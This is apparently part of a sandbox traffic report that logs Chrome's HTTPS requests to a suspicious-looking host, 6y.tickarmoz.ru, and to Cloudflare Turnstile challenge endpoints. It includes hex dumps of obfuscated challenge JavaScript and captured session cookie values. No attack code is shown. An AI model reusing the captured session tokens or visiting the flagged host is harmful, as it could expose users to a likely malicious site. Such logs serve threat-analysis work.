                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211cebe83ff797-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  11192.168.2.1649705172.67.140.1334436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1314OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                  Host: 6y.tickarmoz.ru
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                  Referer: https://6y.tickarmoz.ru/aY57/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6Ik5wUDFDYlhHdFNTR1VUbkN2ekhSanc9PSIsInZhbHVlIjoiRzlVYS9uQitTVjEyYlpHS09DbDJRc3BwSVB6anQrbis5bVlSVk9aYXQ1b290VTUvM2JrWlJlaHdKYWNzWDQ1QUgzOUhsbzJnbE1RVWp2V3ZnQ1crdXVxSGFVSW02NGtpSkdzVW4yc2d5VE03d0RpNmIwZUp0K2FTMFhiVVVHSk4iLCJtYWMiOiJlYzg0YTFiZWM0ZmU3N2MzMTE3MjkwNzcwNzc3YjJlZTg2Y2NkNGE4MjU5OGNiMjNiNzc2NTYwOTMyYTA5ODA3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImczM0tNOEhhTFFPNk03RXVyU0ZXNXc9PSIsInZhbHVlIjoiVnhRUzkvY3k5bnBuV21rdm1ocmZTaXV6Z2ZEVkt6VTMwNTdLYXA5NGlWVzdFQ1hMOFJSWGs0T0pwazVqbjc5ZzYvZVJiaUt6ZW1HRk5sdERCbjc3c1JTK3VLbGFodjJ1cTZhOUFhQlB0SUtwT3AwSzFTaDA2L3JSQzcwc0pqejUiLCJtYWMiOiI2ODZlMGE3Y2Q2M2I1MjA5ZTkyNjQ0MmEwNzc2YWE1MDYyZDViMDNjZDUyZjY3NTg1MTg0ODRkYWMzYmVjMTAxIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1068INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:51 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r1xFHWiy9RDbNdDm%2B6ppedYyYm0155nF1S%2F9Nc1kCjcncOXICpU484wOgnf8a7UD8IFVYy7dg98sE8yyFoQJe3wYahBWkX7yQ4wMTONU260DJiwAikdXS5v0EqxrFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1370&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2252&delivery_rate=2078832&cwnd=251&unsent_bytes=0&cid=ec9f68e0e41c876f&ts=223&x=0"
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Age: 13585
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211cedffc76e06-YUL
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=17662&min_rtt=17646&rtt_var=6650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1892&delivery_rate=164257&cwnd=32&unsent_bytes=0&cid=741cc4fb7bb1f89a&ts=4113&x=0"
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  12192.168.2.1649718104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:51 GMT
                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                  Content-Length: 61
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  cache-control: max-age=2629800, public
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211cef99fa8c95-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  13192.168.2.1649719104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90211ce78d29726b&lang=auto HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:52 GMT
                                                                                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                  Content-Length: 118296
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211cf0fdab8cad-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 69 6e 76
                                                                                                                                                                                                  Data Ascii: or%20if%20this%20problem%20persists.","turnstile_refresh":"Refresh","turnstile_feedback_report":"Having%20trouble%3F","turnstile_feedback_description":"Send%20Feedback","testing_only":"Testing%20only.","human_button_text":"Verify%20you%20are%20human","inv
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 66 39 2c 66 61 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 30 34 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 34 31 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 38 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 36 37 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 37 33 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 39 34 34 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 35 36 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                                                                                                                                                  Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,f9,fa){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1304))/1+-parseInt(gI(1441))/2+-parseInt(gI(598))/3*(-parseInt(gI(367))/4)+parseInt(gI(373))/5*(parseInt(gI(944))/6)+-parseInt(gI(1556))/7+parseInt(gI(
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 44 3d 78 5b 43 5d 2c 45 3d 65 55 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 27 73 27 3d 3d 3d 45 26 26 21 67 5b 68 32 28 35 31 33 29 5d 28 68 5b 44 5d 29 2c 6f 5b 68 32 28 35 30 32 29 5d 28 68 32 28 37 32 36 29 2c 6f 5b 68 32 28 34 33 36 29 5d 28 69 2c 44 29 29 3f 6f 5b 68 32 28 31 30 33 34 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 69 2b 44 2c 68 5b 44 5d 29 29 3a 73 28 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 68 31 29 7b 68 31 3d 62 2c 4f 62 6a 65 63 74 5b 68 31 28 36 31 33 29 5d 5b 68 31 28 31 30 32 39 29 5d 5b 68 31 28 34 38 35 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 68 31 28 33 33 35 29 5d 28 47 29 7d 7d 2c 65 57 3d 67 4a 28 31 34 34 30 29
                                                                                                                                                                                                  Data Ascii: D=x[C],E=eU(g,h,D),B(E)?(F='s'===E&&!g[h2(513)](h[D]),o[h2(502)](h2(726),o[h2(436)](i,D))?o[h2(1034)](s,i+D,E):F||s(i+D,h[D])):s(i+D,E),C++);return j;function s(G,H,h1){h1=b,Object[h1(613)][h1(1029)][h1(485)](j,H)||(j[H]=[]),j[H][h1(335)](G)}},eW=gJ(1440)
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 27 47 75 52 61 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 55 62 77 4f 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4c 59 76 47 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 6d 4f 72 72 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 43 78 63 63 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 79 67 5a 48 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 56 45 70 4f 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 59 4e 44 4b 68 27 3a 66 75 6e 63
                                                                                                                                                                                                  Data Ascii: 'GuRaC':function(h,i){return i==h},'UbwOZ':function(h,i){return h<i},'LYvGq':function(h,i){return h<<i},'mOrru':function(h,i){return h-i},'Cxcco':function(h,i){return h==i},'ygZHV':function(h,i){return h!==i},'VEpOs':function(h,i){return h>i},'YNDKh':func
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 45 28 31 34 30 39 29 5d 28 4f 2c 50 29 7d 7d 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d 5b 5d 2c 49 3d 30 2c 4a 3d 30 2c 4b 3d 30 3b 64 5b 68 46 28 31 31 32 38 29 5d 28 4b 2c 69 5b 68 46 28 35 34 34 29 5d 29 3b 4b 2b 3d 31 29 69 66 28 4c 3d 69 5b 68 46 28 31 33 32 33 29 5d 28 4b 29 2c 4f 62 6a 65 63 74 5b 68 46 28 36 31 33 29 5d 5b 68 46 28 31 30 32 39 29 5d 5b 68 46 28 34 38 35 29 5d 28 42 2c 4c 29 7c 7c 28 42 5b 4c 5d 3d 46 2b 2b 2c 43 5b 4c 5d 3d 21 30 29 2c 4d 3d 44 2b 4c 2c 4f 62 6a 65 63 74 5b 68 46 28 36 31 33 29 5d 5b 68 46 28 31 30 32 39 29 5d 5b 68 46 28 34 38 35 29 5d 28 42 2c 4d 29 29 44 3d 4d 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63
                                                                                                                                                                                                  Data Ascii: E(1409)](O,P)}},i==null)return'';for(B={},C={},D='',E=2,F=3,G=2,H=[],I=0,J=0,K=0;d[hF(1128)](K,i[hF(544)]);K+=1)if(L=i[hF(1323)](K),Object[hF(613)][hF(1029)][hF(485)](B,L)||(B[L]=F++,C[L]=!0),M=D+L,Object[hF(613)][hF(1029)][hF(485)](B,M))D=M;else{if(Objec
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 28 30 29 29 29 7b 66 6f 72 28 78 3d 30 3b 64 5b 68 46 28 31 32 33 34 29 5d 28 78 2c 47 29 3b 49 3c 3c 3d 31 2c 64 5b 68 46 28 33 35 34 29 5d 28 4a 2c 64 5b 68 46 28 31 32 30 39 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 68 46 28 33 33 35 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 68 46 28 31 30 32 31 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 4e 26 31 2e 35 33 7c 49 3c 3c 31 2e 34 35 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 68 46 28 33 33 35 29 5d 28 64 5b 68 46 28 39 33 36 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 68 46 28 33 31 33 29 5d 28 49 2c 31 29 7c 4e 2c 64 5b 68
                                                                                                                                                                                                  Data Ascii: (0))){for(x=0;d[hF(1234)](x,G);I<<=1,d[hF(354)](J,d[hF(1209)](j,1))?(J=0,H[hF(335)](o(I)),I=0):J++,x++);for(N=D[hF(1021)](0),x=0;8>x;I=N&1.53|I<<1.45,J==j-1?(J=0,H[hF(335)](d[hF(936)](o,I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;x<G;I=d[hF(313)](I,1)|N,d[h
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 38 32 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 49 28 33 35 30 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 49 28 39 31 38 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 49 28 38 32 36 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 68 49 28 34 36 38 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 49 28 39 31 38 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 68 49 28 31 32 31 38 29 5d 28 46 2c 4b 29 3b 4c 3d 48 26 47 2c 48 3e
                                                                                                                                                                                                  Data Ascii: 82)](o,I++)),J|=d[hI(350)](0<L?1:0,F),F<<=1);switch(J){case 0:for(J=0,K=Math[hI(918)](2,8),F=1;K!=F;L=G&H,H>>=1,H==0&&(H=j,G=o(I++)),J|=d[hI(826)](0<L?1:0,F),F<<=1);M=d[hI(468)](e,J);break;case 1:for(J=0,K=Math[hI(918)](2,16),F=1;d[hI(1218)](F,K);L=H&G,H>
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 67 5b 69 69 28 35 33 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 73 26 6e 7d 2c 68 3d 67 2c 6d 2c 6a 3d 33 32 2c 6c 3d 68 5b 69 69 28 31 36 36 36 29 5d 28 65 4d 5b 69 69 28 36 38 32 29 5d 5b 69 69 28 35 30 31 29 5d 2c 27 5f 27 29 2b 30 2c 6c 3d 6c 5b 69 69 28 33 39 34 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 2c 69 6a 29 7b 69 6a 3d 69 69 2c 6a 5e 3d 6c 5b 69 6a 28 31 30 32 31 29 5d 28 73 29 7d 29 2c 66 3d 65 4d 5b 69 69 28 34 37 37 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 69 69 28 31 30 32 31 29 5d 28 2b 2b 69 29 29 3b 6b 5b 69 69 28 33 33 35 29 5d 28 53 74 72 69 6e 67 5b 69 69 28 31 33 35 31 29 5d 28 28 68 5b 69 69 28 33 39 36 29 5d 28 68 5b 69 69 28 31 35 30 39 29
                                                                                                                                                                                                  Data Ascii: g[ii(535)]=function(n,s){return s&n},h=g,m,j=32,l=h[ii(1666)](eM[ii(682)][ii(501)],'_')+0,l=l[ii(394)](/./g,function(n,s,ij){ij=ii,j^=l[ij(1021)](s)}),f=eM[ii(477)](f),k=[],i=-1;!isNaN(m=f[ii(1021)](++i));k[ii(335)](String[ii(1351)]((h[ii(396)](h[ii(1509)
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 69 6d 28 33 33 38 29 5d 3d 65 4d 5b 69 6d 28 36 38 32 29 5d 5b 69 6d 28 33 33 38 29 5d 2c 73 5b 69 6d 28 34 31 31 29 5d 3d 65 4d 5b 69 6d 28 36 38 32 29 5d 5b 69 6d 28 34 31 31 29 5d 2c 73 5b 69 6d 28 31 36 38 33 29 5d 3d 65 4d 5b 69 6d 28 36 38 32 29 5d 5b 69 6d 28 34 35 35 29 5d 2c 78 3d 73 2c 42 3d 6e 65 77 20 65 4d 5b 28 69 6d 28 31 32 34 30 29 29 5d 28 29 2c 21 42 29 72 65 74 75 72 6e 3b 43 3d 69 6d 28 36 30 32 29 2c 42 5b 69 6d 28 34 35 32 29 5d 28 43 2c 6f 2c 21 21 5b 5d 29 2c 42 5b 69 6d 28 38 38 31 29 5d 3d 35 65 33 2c 42 5b 69 6d 28 36 30 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 42 5b 69 6d 28 32 35 39 29 5d 28 69 6d 28 31 34 34 34 29 2c 69 6d 28 31 35 35 35 29 29 2c 44 3d 7b 7d 2c 44 5b 69 6d 28 36 31 31 29 5d 3d 67 2c 44 5b 69 6d 28
                                                                                                                                                                                                  Data Ascii: im(338)]=eM[im(682)][im(338)],s[im(411)]=eM[im(682)][im(411)],s[im(1683)]=eM[im(682)][im(455)],x=s,B=new eM[(im(1240))](),!B)return;C=im(602),B[im(452)](C,o,!![]),B[im(881)]=5e3,B[im(603)]=function(){},B[im(259)](im(1444),im(1555)),D={},D[im(611)]=g,D[im(


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  14192.168.2.1649720104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1505571972:1736892714:9ZzSSdQkrASfPzbc2F-di7JK8klPv-kLQYqOPftQ7_o/90211ce78d29726b/l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7 HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Content-Length: 3184
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  CF-Challenge: l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC3184OUTData Raw: 76 5f 39 30 32 31 31 63 65 37 38 64 32 39 37 32 36 62 3d 76 38 68 78 2d 78 45 78 33 78 4a 78 62 65 44 31 65 44 6f 78 65 39 64 6c 55 49 39 44 47 65 51 51 44 24 52 44 64 77 78 65 30 44 59 78 64 68 49 64 6e 30 68 44 71 36 30 44 66 57 65 37 76 44 50 78 65 6f 68 44 64 73 75 38 4d 46 44 73 6c 44 63 44 65 38 44 73 68 56 77 44 52 44 4d 77 64 51 44 6c 77 36 68 44 33 76 57 4d 49 44 4e 78 65 47 53 49 43 56 4c 39 44 69 59 42 68 4d 6f 67 78 64 48 44 72 6e 70 4c 68 79 2d 6e 4c 41 7a 31 61 32 44 58 68 44 69 70 39 44 52 54 68 41 32 44 64 43 6c 44 65 5a 44 76 53 70 72 76 61 49 71 53 5a 72 50 6b 6f 39 35 68 53 6e 25 32 62 33 36 43 44 7a 41 38 51 52 4d 6c 44 65 5a 38 64 2b 55 6e 79 44 74 59 6b 44 4e 6a 44 4d 6d 78 44 4d 38 44 61 78 64 72 52 78 4d 2b 67 7a 61 6e 6b 31 65 65
                                                                                                                                                                                                  Data Ascii: v_90211ce78d29726b=v8hx-xEx3xJxbeD1eDoxe9dlUI9DGeQQD$RDdwxe0DYxdhIdn0hDq60DfWe7vDPxeohDdsu8MFDslDcDe8DshVwDRDMwdQDlw6hD3vWMIDNxeGSICVL9DiYBhMogxdHDrnpLhy-nLAz1a2DXhDip9DRThA2DdClDeZDvSprvaIqSZrPko95hSn%2b36CDzA8QRMlDeZ8d+UnyDtYkDNjDMmxDM8DaxdrRxM+gzank1ee
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC751INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:52 GMT
                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                  Content-Length: 153100
                                                                                                                                                                                                  Connection: close
